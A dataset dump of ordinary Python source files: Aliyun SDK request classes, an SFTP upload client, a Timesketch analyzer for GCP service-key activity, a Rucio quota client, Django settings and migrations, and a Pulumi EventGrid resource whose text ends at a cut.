Dataset schema (column: type, observed range; ⌀ = nullable):

- hexsha: string (length 40)
- size: int64 (1 to 1.03M)
- ext: string (10 classes)
- lang: string (1 class)
- max_stars_repo_path / max_issues_repo_path / max_forks_repo_path: string (length 3 to 239)
- max_stars_repo_name / max_issues_repo_name / max_forks_repo_name: string (length 5 to 130)
- max_stars_repo_head_hexsha / max_issues_repo_head_hexsha / max_forks_repo_head_hexsha: string (length 40 to 78)
- max_stars_repo_licenses / max_issues_repo_licenses / max_forks_repo_licenses: list (length 1 to 10)
- max_stars_count: int64 (1 to 191k, ⌀); max_issues_count: int64 (1 to 67k, ⌀); max_forks_count: int64 (1 to 105k, ⌀)
- stars/issues/forks event_min_datetime and event_max_datetime: string (length 24, ⌀)
- content: string (length 1 to 1.03M)
- avg_line_length: float64 (1 to 958k)
- max_line_length: int64 (1 to 1.03M)
- alphanum_fraction: float64 (0 to 1)

In the rows below, the stars/issues/forks column triplets are shown once where their values coincide.
hexsha: 4a18882ed88b15ef488e2549495977d526ab9588 | size: 2,195 | ext: py | lang: Python
repo_path: aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/ListAgentEventsRequest.py
repo_name: liumihust/aliyun-openapi-python-sdk | head_hexsha: c7b5dd4befae4b9c59181654289f9272531207ef
licenses: ["Apache-2.0"] | stars: null | issues: null | forks: null
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data


class ListAgentEventsRequest(RpcRequest):

    def __init__(self):
        RpcRequest.__init__(self, 'CCC', '2017-07-05', 'ListAgentEvents')
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    def get_StartTime(self):
        return self.get_query_params().get('StartTime')

    def set_StartTime(self, StartTime):
        self.add_query_param('StartTime', StartTime)

    def get_StopTime(self):
        return self.get_query_params().get('StopTime')

    def set_StopTime(self, StopTime):
        self.add_query_param('StopTime', StopTime)

    def get_RamIds(self):
        return self.get_query_params().get('RamIds')

    def set_RamIds(self, RamIds):
        for i in range(len(RamIds)):
            if RamIds[i] is not None:
                self.add_query_param('RamId.' + str(i + 1), RamIds[i])

    def get_InstanceId(self):
        return self.get_query_params().get('InstanceId')

    def set_InstanceId(self, InstanceId):
        self.add_query_param('InstanceId', InstanceId)

    def get_Events(self):
        return self.get_query_params().get('Events')

    def set_Events(self, Events):
        for i in range(len(Events)):
            if Events[i] is not None:
                self.add_query_param('Event.' + str(i + 1), Events[i])
avg_line_length: 33.769231 | max_line_length: 74 | alphanum_fraction: 0.740319
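The request class above only assembles query parameters; it is executed through the core SDK client. A minimal usage sketch (the credentials, region id, instance id, and event names below are placeholders, not values from this dataset row):

```python
from aliyunsdkcore.client import AcsClient

# Hypothetical credentials and region -- replace with real values.
client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-shanghai')

request = ListAgentEventsRequest()
request.set_InstanceId('<ccc-instance-id>')
# The list setter expands to numbered keys Event.1, Event.2, ...
request.set_Events(['<event-name-1>', '<event-name-2>'])

# Signs and sends the RPC request, returning the raw response body.
response = client.do_action_with_exception(request)
print(response)
```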
hexsha: 4a188903ce39a19145a3d803a250acdd5583c378 | size: 423 | ext: py | lang: Python
repo_path: apps/fithm-service/libs/depends/register.py
repo_name: sergio1221/flask-backend | head_hexsha: 11a9e0db5b5e664fcc820919d97039738176ac62
licenses: ["BSD-3-Clause"] | stars: 3 (2022-03-04T03:05:55.000Z to 2022-03-04T09:02:32.000Z) | issues: null | forks: null
from libs.quovo.base import QuovoRequest
from .entry import DIEntry, container


def register_all():
    '''Register all DI entries'''
    register_admin_entries()
    register_helpers()


def register_admin_entries():
    pass


def register_helpers():
    def quovo_request_create():
        return QuovoRequest()

    container.add(DIEntry(
        QuovoRequest, quovo_request_create
    ))
avg_line_length: 16.269231 | max_line_length: 43 | alphanum_fraction: 0.659574
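`DIEntry` and `container` are imported from the sibling `entry` module, which is not part of this row. A plausible minimal shape for that module, assuming the container simply maps a type to a zero-argument factory (an illustrative sketch, not the project's actual code):

```python
class DIEntry:
    """Binds a dependency key (here, a class) to a zero-argument factory."""
    def __init__(self, key, factory):
        self.key = key
        self.factory = factory


class Container:
    """Registry that resolves a key by calling its registered factory."""
    def __init__(self):
        self._entries = {}

    def add(self, entry):
        self._entries[entry.key] = entry

    def get(self, key):
        # Build a fresh instance on every resolution.
        return self._entries[key].factory()


container = Container()
```

Under this shape, `container.get(QuovoRequest)` would return a new `QuovoRequest` built by `quovo_request_create`.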
hexsha: 4a188a4cb2cb69cd0df134eb851677207baed735 | size: 3,500 | ext: py | lang: Python
repo_path: aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/ModifyClusterServiceConfigRequest.py
repo_name: yndu13/aliyun-openapi-python-sdk | head_hexsha: 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
licenses: ["Apache-2.0"] | stars: 1,001 (2015-07-24T01:32:41.000Z to 2022-03-25T01:28:18.000Z) | issues: 363 (2015-10-20T03:15:00.000Z to 2022-03-08T12:26:19.000Z) | forks: 682 (2015-09-22T07:19:02.000Z to 2022-03-22T09:51:46.000Z)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data


class ModifyClusterServiceConfigRequest(RpcRequest):

    def __init__(self):
        RpcRequest.__init__(self, 'Emr', '2016-04-08', 'ModifyClusterServiceConfig', 'emr')
        self.set_method('POST')
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    def get_RefreshHostConfig(self):
        return self.get_query_params().get('RefreshHostConfig')

    def set_RefreshHostConfig(self, RefreshHostConfig):
        self.add_query_param('RefreshHostConfig', RefreshHostConfig)

    def get_ResourceOwnerId(self):
        return self.get_query_params().get('ResourceOwnerId')

    def set_ResourceOwnerId(self, ResourceOwnerId):
        self.add_query_param('ResourceOwnerId', ResourceOwnerId)

    def get_HostInstanceId(self):
        return self.get_query_params().get('HostInstanceId')

    def set_HostInstanceId(self, HostInstanceId):
        self.add_query_param('HostInstanceId', HostInstanceId)

    def get_ServiceName(self):
        return self.get_query_params().get('ServiceName')

    def set_ServiceName(self, ServiceName):
        self.add_query_param('ServiceName', ServiceName)

    def get_GatewayClusterIdLists(self):
        return self.get_query_params().get('GatewayClusterIdList')

    def set_GatewayClusterIdLists(self, GatewayClusterIdLists):
        for depth1 in range(len(GatewayClusterIdLists)):
            if GatewayClusterIdLists[depth1] is not None:
                self.add_query_param('GatewayClusterIdList.' + str(depth1 + 1), GatewayClusterIdLists[depth1])

    def get_ConfigParams(self):
        return self.get_query_params().get('ConfigParams')

    def set_ConfigParams(self, ConfigParams):
        self.add_query_param('ConfigParams', ConfigParams)

    def get_ConfigType(self):
        return self.get_query_params().get('ConfigType')

    def set_ConfigType(self, ConfigType):
        self.add_query_param('ConfigType', ConfigType)

    def get_GroupId(self):
        return self.get_query_params().get('GroupId')

    def set_GroupId(self, GroupId):
        self.add_query_param('GroupId', GroupId)

    def get_ClusterId(self):
        return self.get_query_params().get('ClusterId')

    def set_ClusterId(self, ClusterId):
        self.add_query_param('ClusterId', ClusterId)

    def get_CustomConfigParams(self):
        return self.get_query_params().get('CustomConfigParams')

    def set_CustomConfigParams(self, CustomConfigParams):
        self.add_query_param('CustomConfigParams', CustomConfigParams)

    def get_Comment(self):
        return self.get_query_params().get('Comment')

    def set_Comment(self, Comment):
        self.add_query_param('Comment', Comment)
avg_line_length: 35 | max_line_length: 100 | alphanum_fraction: 0.773143
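The list-valued setter is the notable part of this request: the SDK flattens a Python list into numbered query keys. A small sketch of the observable effect (the cluster, service, and gateway ids are placeholders):

```python
request = ModifyClusterServiceConfigRequest()
request.set_ServiceName('HDFS')
request.set_ConfigParams('{"dfs.replication": "3"}')  # JSON string of config key/values
request.set_GatewayClusterIdLists(['C-GW1', 'C-GW2'])

# Each list element became its own numbered parameter:
params = request.get_query_params()
assert params['GatewayClusterIdList.1'] == 'C-GW1'
assert params['GatewayClusterIdList.2'] == 'C-GW2'
```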
hexsha: 4a188b12918e6b0e9f8e6f9cc1f7a056cc5daf48 | size: 42 | ext: py | lang: Python
repo_path: pymkup/__init__.py | repo_name: psolin/pymkup | head_hexsha: 5f2e5787f3150e10b9c6391c805b02be7496cdc1
licenses: ["MIT"] | stars: 7 (2021-04-17T11:35:00.000Z to 2021-12-30T04:05:27.000Z) | issues: 23 (2021-04-15T18:01:44.000Z to 2021-05-21T15:58:59.000Z) | forks: 2 (2021-04-20T18:09:46.000Z to 2021-04-24T13:04:04.000Z)
from .pymkup import *
__version__ = '0.1'
avg_line_length: 14 | max_line_length: 21 | alphanum_fraction: 0.690476
hexsha: 4a188c0342bb9916a6347c85d5a2c3f8cfa222f8 | size: 3,210 | ext: py | lang: Python
repo_path: app/sftp/ftp_client.py | repo_name: alphagov/notifications-ftp | head_hexsha: a3e2365e1bf31d540361cb40d60faa34414b10ab
licenses: ["MIT"] | stars: 1 (2018-01-08T03:07:42.000Z to 2018-01-08T03:07:42.000Z) | issues: 182 (2018-01-08T01:59:04.000Z to 2022-03-11T15:47:57.000Z) | forks: 3 (2018-01-08T01:54:41.000Z to 2021-04-10T19:10:29.000Z)
from contextlib import contextmanager
import pysftp
from flask import current_app
from monotonic import monotonic
NOTIFY_SUBFOLDER = 'notify'
class FtpException(Exception):
    pass


class FtpClient():
    def init_app(self, app):
        self.host = app.config.get('FTP_HOST')
        self.username = app.config.get('FTP_USERNAME')
        self.password = app.config.get('FTP_PASSWORD')

    @contextmanager
    def _sftp(self):
        try:
            cnopts = pysftp.CnOpts()
            cnopts.hostkeys = None
            current_app.logger.info("opening connection to {}".format(self.host))
            with pysftp.Connection(self.host, username=self.username, password=self.password, cnopts=cnopts) as sftp:
                yield sftp
        except Exception as e:
            # reraise all exceptions as FtpException to ensure we can handle them down the line
            current_app.logger.exception(e)
            raise FtpException("Failed to sFTP file")

    def send_zip(self, zip_data, filename):
        with self._sftp() as sftp:
            upload_zip(sftp, zip_data, filename)

    def file_exists_with_correct_size(self, filename, zip_data_len):
        with self._sftp() as sftp:
            check_file_exist_and_is_right_size(sftp, filename, zip_data_len)


def upload_zip(sftp, zip_data, filename):
    sftp.chdir(NOTIFY_SUBFOLDER)
    zip_data_len = len(zip_data)
    current_app.logger.info("uploading zip {} of total size {:,}".format(filename, zip_data_len))
    start_time = monotonic()
    if sftp.exists('{}/{}'.format(sftp.pwd, filename)):
        stats = sftp.lstat('{}/{}'.format(sftp.pwd, filename))
        if stats.st_size == zip_data_len:
            current_app.logger.info('{} already exists on DVLA ftp with matching filesize {}, skipping'.format(
                filename, stats.st_size
            ))
            return
        else:
            current_app.logger.info('{} already exists on DVLA ftp with different filesize {}, overwriting'.format(
                filename, stats.st_size
            ))
    upload_start_time = monotonic()
    with sftp.open('{}/{}'.format(sftp.pwd, filename), mode='w') as remote_file:
        remote_file.set_pipelined()
        zip_data = memoryview(zip_data)
        remote_file.write(zip_data)
    upload_duration = monotonic() - upload_start_time
    current_app.logger.info("uploaded file {} of total size {} bytes in {} seconds".format(
        filename, zip_data_len, upload_duration))
    check_file_exist_and_is_right_size(sftp, filename, zip_data_len)
    current_app.logger.info("Data {} uploaded to DVLA".format(filename))
    current_app.logger.info("Total duration for {} {} seconds".format(filename, monotonic() - start_time))


def check_file_exist_and_is_right_size(sftp, filename, zip_data_len):
    if filename in sftp.listdir():
        stats = sftp.lstat('{}/{}'.format(sftp.pwd, filename))
        if stats.st_size != zip_data_len:
            raise FtpException(
                "Zip file {} uploaded but size is incorrect: is {}, expected {}".format(
                    filename, stats.st_size, zip_data_len))
    else:
        raise FtpException("Zip file {} not uploaded".format(filename))
avg_line_length: 36.067416 | max_line_length: 117 | alphanum_fraction: 0.655452
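`FtpClient` reads its connection settings from the Flask config at `init_app` time and needs an application context so `current_app` logging works. A minimal usage sketch (the host, credentials, and filename are placeholders):

```python
from flask import Flask

app = Flask(__name__)
app.config.update(
    FTP_HOST='sftp.example.com',   # placeholder host
    FTP_USERNAME='notify',         # placeholder credentials
    FTP_PASSWORD='secret',
)

ftp_client = FtpClient()
ftp_client.init_app(app)

zip_data = b'PK\x05\x06' + b'\x00' * 18  # smallest valid (empty) zip, for illustration
with app.app_context():
    ftp_client.send_zip(zip_data, 'NOTIFY.20180101.zip')
    ftp_client.file_exists_with_correct_size('NOTIFY.20180101.zip', len(zip_data))
```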
hexsha: 4a188c266151a72f110ca85b106ae3097c4725c5 | size: 889 | ext: py | lang: Python
repo_path: tools/migrations/0020_auto_20180206_1419.py | head_hexsha: b059b77bfda173794b3cad55874cb06edc70d0e1
repo_name: moonbirddk/networked-toolbox (stars, forks); Socialsquare/networked-toolbox (issues)
licenses: ["BSD-2-Clause-FreeBSD"] | stars: 2 (2016-09-02T12:45:31.000Z to 2018-02-10T10:18:11.000Z) | issues: 17 (2020-03-24T15:58:05.000Z to 2022-02-10T08:08:57.000Z) | forks: 1 (2018-01-05T08:02:18.000Z to 2018-01-05T08:02:18.000Z)
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-02-06 14:19
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    dependencies = [
        ('tools', '0019_auto_20180206_1108'),
    ]

    operations = [
        migrations.AlterField(
            model_name='story',
            name='category_group',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stories', to='tools.CategoryGroup', verbose_name='Thematic Area'),
        ),
        migrations.AlterField(
            model_name='story',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='author'),
        ),
    ]
avg_line_length: 31.75 | max_line_length: 184 | alphanum_fraction: 0.664792
hexsha: 4a188c64bdfbd75470ddc88838e3e7e35d6a3e68 | size: 236 | ext: py | lang: Python
repo_path: sawyer/ros/envs/sawyer/__init__.py | repo_name: taohnouaccountb/gym-sawyer | head_hexsha: e1b7259dcb21216f760bca05d87467d8df003d44
licenses: ["MIT"] | stars: 35 (2018-10-29T07:19:34.000Z to 2021-02-05T16:24:00.000Z) | issues: 21 (2018-10-24T05:51:35.000Z to 2020-09-11T10:40:31.000Z) | forks: 9 (2018-11-12T14:28:59.000Z to 2020-04-13T12:49:21.000Z)
from sawyer.ros.envs.sawyer.pick_and_place_env import PickAndPlaceEnv
from sawyer.ros.envs.sawyer.push_env import PushEnv
from sawyer.ros.envs.sawyer.reacher_env import ReacherEnv
__all__ = ["PickAndPlaceEnv", "PushEnv", "ReacherEnv"]
avg_line_length: 39.333333 | max_line_length: 69 | alphanum_fraction: 0.826271
hexsha: 4a188d36e2a73d58f462e1a52d2518b3fdf84a8d | size: 2,013 | ext: py | lang: Python
repo_path: timesketch/lib/analyzers/gcp_servicekey.py | repo_name: wajihyassine/timesketch | head_hexsha: b099d1afb33d0b9f906a0ad407979c8f22a54476
licenses: ["Apache-2.0"] | stars: 1,810 (2015-01-03T22:34:45.000Z to 2022-03-30T10:23:18.000Z) | issues: 1,291 (2015-01-08T00:00:12.000Z to 2022-03-29T03:26:58.000Z) | forks: 519 (2015-01-20T09:26:06.000Z to 2022-03-29T11:02:10.000Z)
"""Sketch analyzer plugin for GCP Service Key usage."""
from __future__ import unicode_literals
from timesketch.lib.analyzers import interface
from timesketch.lib.analyzers import manager
class GcpServiceKeySketchPlugin(interface.BaseAnalyzer):
    """Analyzer for GCP Service Key usage."""

    NAME = 'gcp_servicekey'
    DISPLAY_NAME = 'Google Compute Engine actions'
    DESCRIPTION = 'Extract GCE actions from Stackdriver logs'

    def run(self):
        """Entry point for the analyzer.

        Returns:
            String with summary of the analyzer result.
        """
        # TODO: update dftimewolf stackdriver module to produce more detailed
        # attributes
        query = 'principalEmail:*gserviceaccount.com'
        return_fields = ['message', 'methodName']

        events = self.event_stream(
            query_string=query, return_fields=return_fields)

        simple_counter = 0
        for event in events:
            # Fields to analyze.
            method_name = event.source.get('methodName')

            if 'CreateServiceAccount' in method_name:
                event.add_tags(['service-account-created'])

            if 'compute.instances.insert' in method_name:
                event.add_tags(['gce-instance-created'])

            if 'compute.firewalls.insert' in method_name:
                event.add_tags(['fw-rule-created'])

            if 'compute.networks.insert' in method_name:
                event.add_tags(['network-created'])

            # Commit the event to the datastore.
            event.commit()
            simple_counter += 1

        # Create a saved view with our query.
        if simple_counter:
            self.sketch.add_view(
                view_name='GCP ServiceKey activity', analyzer_name=self.NAME,
                query_string=query)

        return ('GCP ServiceKey analyzer completed with '
                '{0:d} service key events marked').format(simple_counter)


manager.AnalysisManager.register_analyzer(GcpServiceKeySketchPlugin)
avg_line_length: 32.467742 | max_line_length: 77 | alphanum_fraction: 0.639344
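The analyzer's tagging rules reduce to a substring-to-tag lookup over `methodName`. Pulled out of the Timesketch event loop, the same logic can be written as a standalone function (an illustrative sketch, not part of the analyzer API):

```python
TAG_RULES = {
    'CreateServiceAccount': 'service-account-created',
    'compute.instances.insert': 'gce-instance-created',
    'compute.firewalls.insert': 'fw-rule-created',
    'compute.networks.insert': 'network-created',
}


def tags_for_method(method_name):
    """Return every tag whose trigger substring occurs in method_name."""
    return [tag for trigger, tag in TAG_RULES.items() if trigger in method_name]


assert tags_for_method('beta.compute.instances.insert') == ['gce-instance-created']
assert tags_for_method('google.iam.admin.v1.CreateServiceAccount') == ['service-account-created']
```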
hexsha: 4a188e09fcbdc83871c91e2f96b6401db7927b13 | size: 6,557 | ext: py | lang: Python
repo_path: lib/rucio/client/accountlimitclient.py | repo_name: lgoossen/rucio | head_hexsha: 12c42ad15e55ed30a5fd6ddf90526e657827740c
licenses: ["Apache-2.0"] | stars: null | issues: null | forks: 1 (2020-01-30T11:03:53.000Z to 2020-01-30T11:03:53.000Z)
# Copyright 2014-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2014-2018
# - Cedric Serfon <cedric.serfon@cern.ch>, 2014
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
# - Ralph Vigne <ralph.vigne@cern.ch>, 2015
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2019
#
# PY3K COMPATIBLE
from json import dumps
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.utils import build_url
class AccountLimitClient(BaseClient):
    """Account limit client class for working with account limits"""

    ACCOUNTLIMIT_BASEURL = 'accountlimits'

    def __init__(self, rucio_host=None, auth_host=None, account=None, ca_cert=None,
                 auth_type=None, creds=None, timeout=600, user_agent='rucio-clients'):
        super(AccountLimitClient, self).__init__(rucio_host, auth_host, account, ca_cert,
                                                 auth_type, creds, timeout, user_agent)

    def set_account_limit(self, account, rse, bytes, locality):
        """
        Sets an account limit for a given limit scope.

        :param account: The name of the account.
        :param rse: The rse name.
        :param bytes: An integer with the limit in bytes.
        :param locality: The scope of the account limit. 'local' or 'global'.
        :return: True if quota was created successfully else False.
        """
        if locality == 'local':
            return self.set_local_account_limit(account, rse, bytes)
        elif locality == 'global':
            return self.set_global_account_limit(account, rse, bytes)
        else:
            from rucio.common.exception import UnsupportedOperation
            raise UnsupportedOperation('The provided scope (%s) for the account limit was invalid' % locality)

    def delete_account_limit(self, account, rse, locality):
        """
        Deletes an account limit for a given limit scope.

        :param account: The name of the account.
        :param rse: The rse name.
        :param locality: The scope of the account limit. 'local' or 'global'.
        :return: True if quota was created successfully else False.
        """
        if locality == 'local':
            return self.delete_local_account_limit(account, rse)
        elif locality == 'global':
            return self.delete_global_account_limit(account, rse)
        else:
            from rucio.common.exception import UnsupportedOperation
            raise UnsupportedOperation('The provided scope (%s) for the account limit was invalid' % locality)

    def set_local_account_limit(self, account, rse, bytes):
        """
        Sends the request to set an account limit for an account.

        :param account: The name of the account.
        :param rse: The rse name.
        :param bytes: An integer with the limit in bytes.
        :return: True if quota was created successfully else False.
        """
        data = dumps({'bytes': bytes})
        path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'local', account, rse])
        url = build_url(choice(self.list_hosts), path=path)

        r = self._send_request(url, type='POST', data=data)

        if r.status_code == codes.created:
            return True
        else:
            exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
            raise exc_cls(exc_msg)

    def delete_local_account_limit(self, account, rse):
        """
        Sends the request to remove an account limit.

        :param account: The name of the account.
        :param rse: The rse name.
        :return: True if quota was removed successfully. False otherwise.
        :raises AccountNotFound: if account doesn't exist.
        """
        path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'local', account, rse])
        url = build_url(choice(self.list_hosts), path=path)

        r = self._send_request(url, type='DEL')

        if r.status_code == codes.ok:
            return True
        else:
            exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
            raise exc_cls(exc_msg)

    def set_global_account_limit(self, account, rse_expression, bytes):
        """
        Sends the request to set a global account limit for an account.

        :param account: The name of the account.
        :param rse_expression: The rse expression.
        :param bytes: An integer with the limit in bytes.
        :return: True if quota was created successfully else False.
        """
        data = dumps({'bytes': bytes})
        path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'global', account, rse_expression])
        url = build_url(choice(self.list_hosts), path=path)

        r = self._send_request(url, type='POST', data=data)

        if r.status_code == codes.created:
            return True
        else:
            exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
            raise exc_cls(exc_msg)

    def delete_global_account_limit(self, account, rse_expression):
        """
        Sends the request to remove a global account limit.

        :param account: The name of the account.
        :param rse_expression: The rse expression.
        :return: True if quota was removed successfully. False otherwise.
        :raises AccountNotFound: if account doesn't exist.
        """
        path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'global', account, rse_expression])
        url = build_url(choice(self.list_hosts), path=path)

        r = self._send_request(url, type='DEL')

        if r.status_code == codes.ok:
            return True
        else:
            exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
            raise exc_cls(exc_msg)
avg_line_length: 39.263473 | max_line_length: 112 | alphanum_fraction: 0.649687
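The limit-setting methods are thin wrappers over the REST endpoints, so typical use is a few one-liners. A usage sketch (the account, RSE, RSE expression, and quota sizes are placeholders; the no-argument constructor assumes a standard Rucio client configuration is available):

```python
client = AccountLimitClient()

# Set a 10 TiB local quota for one account on one RSE.
client.set_account_limit('jdoe', 'SITE_DATADISK', 10 * 1024**4, 'local')

# Global limits take an RSE expression rather than a single RSE name.
client.set_account_limit('jdoe', 'tier=1', 5 * 1024**4, 'global')

# Remove the local quota again.
client.delete_account_limit('jdoe', 'SITE_DATADISK', 'local')
```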
hexsha: 4a188e187f14e6d102b3a9a7a29b8effec070ab7 | size: 316 | ext: py | lang: Python
repo_path: tests/conftest.py | repo_name: mariomoore/paperace | head_hexsha: a120560bfc5bf321a5e878ef20db271a77ce400d
licenses: ["MIT"] | stars: null | issues: null | forks: null
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Dummy conftest.py for paperace.
If you don't know what this is for, just leave it empty.
Read more about conftest.py under:
https://pytest.org/latest/plugins.html
"""
from __future__ import print_function, absolute_import, division
# import pytest
avg_line_length: 24.307692 | max_line_length: 64 | alphanum_fraction: 0.699367
hexsha: 4a188e4782729f5ca5c97ad7c393672804bd7624 | size: 3,234 | ext: py | lang: Python
repo_path: profiles_project/settings.py | repo_name: sumaiyamulla786/profiles-rest-api | head_hexsha: 8b65992ad3dd008defca68ee930ae9ed3fc45d2c
licenses: ["MIT"] | stars: null | issues: null | forks: null
"""
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2*czq+&9q=7$6+=ku$y+^-vd%)_p7n@$mo7qz-egry!&3r0@xm'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'profiles_api',
    'rest_framework',
    'rest_framework.authtoken'
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'profiles_project.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'profiles_project.wsgi.application'

# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'profiles_api.UserProfile'
avg_line_length: 25.872 | max_line_length: 91 | alphanum_fraction: 0.698207
hexsha: 4a188edced93db6cf515eff90ce5ec876340a0e4 | size: 34,628 | ext: py | lang: Python
repo_path: sdk/python/pulumi_azure/eventhub/event_grid_topic.py | repo_name: aangelisc/pulumi-azure | head_hexsha: 71dd9c75403146e16f7480e5a60b08bc0329660e
licenses: ["ECL-2.0", "Apache-2.0"] | stars: null | issues: null | forks: null
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['EventGridTopicArgs', 'EventGridTopic']
@pulumi.input_type
class EventGridTopicArgs:
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]] = None,
                 input_mapping_default_values: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']] = None,
                 input_mapping_fields: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']] = None,
                 input_schema: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing an EventGridTopic resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
